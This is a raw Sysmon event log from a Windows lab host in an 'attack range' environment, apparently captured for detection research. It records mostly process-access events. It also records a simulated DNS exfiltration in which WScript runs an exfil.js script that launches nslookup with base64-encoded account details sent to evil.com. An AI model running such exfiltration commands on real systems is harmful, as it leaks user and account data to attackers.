14:16:30.280{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.280{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.280{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.280{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.280{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-4C40-000000005F02}2040C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.280{2E1864BB-17BE-629A-4A40-000000005F02}79848152C:\Windows\system32\cmd.exe{2E1864BB-17BE-629A-4C40-000000005F02}2040C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.281{2E1864BB-17BE-629A-4C40-000000005F02}2040C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BE-629A-4A40-000000005F02}7984C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrncbyh.tmp 2>&1 10341000x8000000000000000200024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.249{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BE-629A-4B40-000000005F02}2620C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.249{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BE-629A-4B40-000000005F02}2620C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.249{2E1864BB-17BE-629A-4B40-000000005F02}26203736C:\Windows\system32\conhost.exe{2E1864BB-17BE-629A-4A40-000000005F02}7984C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.233{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-4B40-000000005F02}2620C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.233{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.233{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.233{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.233{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.233{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-4A40-000000005F02}7984C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.233{2E1864BB-17A1-629A-783D-000000005F02}55524592C:\Windows\System32\WScript.exe{2E1864BB-17BE-629A-4A40-000000005F02}7984C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.238{2E1864BB-17BE-629A-4A40-000000005F02}7984C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrncbyh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.233{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfbypp.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.196{2E1864BB-17BE-629A-4840-000000005F02}50847376C:\Windows\system32\conhost.exe{2E1864BB-17BE-629A-4940-000000005F02}8000C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.196{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.196{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.196{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.196{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.196{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-4940-000000005F02}8000C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.196{2E1864BB-17BE-629A-4740-000000005F02}64882628C:\Windows\system32\cmd.exe{2E1864BB-17BE-629A-4940-000000005F02}8000C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.197{2E1864BB-17BE-629A-4940-000000005F02}8000C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BE-629A-4740-000000005F02}6488C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfbypp.tmp 2>&1 10341000x8000000000000000200004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.181{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BE-629A-4840-000000005F02}5084C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.165{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BE-629A-4840-000000005F02}5084C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.165{2E1864BB-17BE-629A-4840-000000005F02}50847376C:\Windows\system32\conhost.exe{2E1864BB-17BE-629A-4740-000000005F02}6488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.165{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-4840-000000005F02}5084C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.149{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-4740-000000005F02}6488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 